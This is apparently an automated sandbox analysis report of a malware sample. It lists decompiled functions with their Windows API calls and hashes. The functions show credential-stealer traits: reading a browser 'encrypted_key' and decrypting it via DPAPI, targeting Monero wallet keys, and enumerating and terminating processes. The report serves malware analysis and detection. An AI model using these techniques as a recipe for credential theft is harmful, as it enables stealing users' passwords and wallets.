                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 961878ff2832cccabd7c1eca3df4b45de78919eb7d658c7fcfa8775d727a9039
                                  • Instruction ID: 49b4f978ef1d09ccd2b42bd0a46f8bd784998b7368dfcd411bc82ec81edb28a4
                                  • Opcode Fuzzy Hash: 961878ff2832cccabd7c1eca3df4b45de78919eb7d658c7fcfa8775d727a9039
                                  • Instruction Fuzzy Hash: A9413371D1010AABDB04EFA4D855AFEBB74FF54308F008418E41676291DB75AA09CF92
                                  Function 00539CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 005399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005399EC
                                    • Part of subcall function 005399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00539A11
                                    • Part of subcall function 005399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00539A31
                                    • Part of subcall function 005399C0: ReadFile.KERNEL32(000000FF,?,00000000,0053148F,00000000), ref: 00539A5A
                                    • Part of subcall function 005399C0: LocalFree.KERNEL32(0053148F), ref: 00539A90
                                    • Part of subcall function 005399C0: CloseHandle.KERNEL32(000000FF), ref: 00539A9A
                                    • Part of subcall function 00548E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00548E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00539D39
                                    • Part of subcall function 00539AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NS,00000000,00000000), ref: 00539AEF
                                    • Part of subcall function 00539AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00534EEE,00000000,?), ref: 00539B01
                                    • Part of subcall function 00539AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NS,00000000,00000000), ref: 00539B2A
                                    • Part of subcall function 00539AC0: LocalFree.KERNEL32(?,?,?,?,00534EEE,00000000,?), ref: 00539B3F
                                    • Part of subcall function 00539B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00539B84
                                    • Part of subcall function 00539B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00539BA3
                                    • Part of subcall function 00539B60: LocalFree.KERNEL32(?), ref: 00539BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 7f8fa45d6bd988c95f9a1b24fa9f04b5388db37c9defd0c3ccc8bb447e4cc2ca
                                  • Instruction ID: 41730380ff12a899cd42d0dc9546b433fdb396fa33eba9aa0656bdcb80b872d6
                                  • Opcode Fuzzy Hash: 7f8fa45d6bd988c95f9a1b24fa9f04b5388db37c9defd0c3ccc8bb447e4cc2ca
                                  • Instruction Fuzzy Hash: 8B3132B6D10109ABDF14DFE4DC86AEFBBB8BF88304F144919E905A7241E7749A04CBA5
                                  Function 005494D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 005494EB
                                    • Part of subcall function 00548D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0054951E,00000000), ref: 00548D5B
                                    • Part of subcall function 00548D50: RtlAllocateHeap.NTDLL(00000000), ref: 00548D62
                                    • Part of subcall function 00548D50: wsprintfW.USER32 ref: 00548D78
                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 005495AB
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 005495C9
                                  • CloseHandle.KERNEL32(00000000), ref: 005495D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                  • String ID:
                                  • API String ID: 3729781310-0
                                  • Opcode ID: 99538d6b08a421df4cc8329969151ea3cb00d930fc32888221f946f55fc7cbce
                                  • Instruction ID: 650f055a981969dc4f3e75552e13131a54a82026988dc14d1159eda2f430d507
                                  • Opcode Fuzzy Hash: 99538d6b08a421df4cc8329969151ea3cb00d930fc32888221f946f55fc7cbce
                                  • Instruction Fuzzy Hash: 71311E71E00208AFEB14DFD0CD49BEEB774FF84305F208559E50AAA184DB789A89CB56
                                  Function 00548680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005505B7), ref: 005486CA
                                  • Process32First.KERNEL32(?,00000128), ref: 005486DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 005486F3
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • CloseHandle.KERNEL32(?), ref: 00548761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 7d07f00f7899340fc8654454f2e3f3ad80d75a068507d6a4d722da85f0639f87
                                  • Instruction ID: 72869a5f5442338a26458dd74445a44e9268e48752f469af85d0b6cceb4b38a3
                                  • Opcode Fuzzy Hash: 7d07f00f7899340fc8654454f2e3f3ad80d75a068507d6a4d722da85f0639f87
                                  • Instruction Fuzzy Hash: E6318D71941219ABDB64DF50CC59FEEBB78FB84704F108199E10AA21A0DB346A44CFA1
                                  Function 00547980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00550E00,00000000,?), ref: 005479B0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 005479B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00550E00,00000000,?), ref: 005479C4
                                  • wsprintfA.USER32 ref: 005479F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 090b414547e2ecf49d4fd59a9f76a98f796f333c9e858f8bdfb4005437534064
                                  • Instruction ID: b94758e6caa7bac57e8bd6d4f409af0a0c2dc540d7e4a41ab3cbb24fa54fbd06
                                  • Opcode Fuzzy Hash: 090b414547e2ecf49d4fd59a9f76a98f796f333c9e858f8bdfb4005437534064
                                  • Instruction Fuzzy Hash: C41118B2904118AADB149FC9DD45BBEBBF8FB4CB11F14425AF605A2280D2395940CBB5
                                  Function 0054C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 0054C74E
                                    • Part of subcall function 0054BF9F: __amsg_exit.LIBCMT ref: 0054BFAF
                                  • __getptd.LIBCMT ref: 0054C765
                                  • __amsg_exit.LIBCMT ref: 0054C773
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0054C797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: d6c8bb19e6dd81b0c9f5dc1388daaacc17f4fce017a18ce2f7fe4ec8820c2389
                                  • Instruction ID: 71f87f1eb87d512c83a5b10778d66fd2dfba0653f369d01683c5e135ceaa90ee
                                  • Opcode Fuzzy Hash: d6c8bb19e6dd81b0c9f5dc1388daaacc17f4fce017a18ce2f7fe4ec8820c2389
                                  • Instruction Fuzzy Hash: 64F0BB32942702ABE7A0BB78580F7DD3FA0BFC072DF10414DF404A71D2DB6499449E56
                                  Function 00544F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00548DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00548E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00544F7A
                                  • lstrcat.KERNEL32(?,00551070), ref: 00544F97
                                  • lstrcat.KERNEL32(?,011F90A8), ref: 00544FAB
                                  • lstrcat.KERNEL32(?,00551074), ref: 00544FBD
                                    • Part of subcall function 00544910: wsprintfA.USER32 ref: 0054492C
                                    • Part of subcall function 00544910: FindFirstFileA.KERNEL32(?,?), ref: 00544943
                                    • Part of subcall function 00544910: StrCmpCA.SHLWAPI(?,00550FDC), ref: 00544971
                                    • Part of subcall function 00544910: StrCmpCA.SHLWAPI(?,00550FE0), ref: 00544987
                                    • Part of subcall function 00544910: FindNextFileA.KERNEL32(000000FF,?), ref: 00544B7D
                                    • Part of subcall function 00544910: FindClose.KERNEL32(000000FF), ref: 00544B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: 4f93bf92d04745462ce98c20afb4a039dd1c9096c056ecc4f3dafa8bd7e63a90
                                  • Instruction ID: 9bdcb49f1db4a45f67c5f5ce5bbf3ca332ab46fae81cdfd08cfc9215991e542e
                                  • Opcode Fuzzy Hash: 4f93bf92d04745462ce98c20afb4a039dd1c9096c056ecc4f3dafa8bd7e63a90
                                  • Instruction Fuzzy Hash: CE21867690020977D754FBB0DC4AEED3B3CBBD4341F008555B65A92181EE749AC88F96